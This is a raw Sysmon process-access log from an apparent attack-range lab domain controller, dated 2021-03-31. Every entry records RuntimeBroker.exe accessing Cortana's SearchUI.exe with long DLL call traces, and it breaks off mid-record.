12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49244776C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.onecore.dll+1717e|C:\Windows\system32\windows.cortana.onecore.dll+15fb7|C:\Windows\system32\windows.cortana.onecore.dll+16127|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506 10341000x80000000000000007274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245864C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245864C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245864C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245864C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245376C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\comba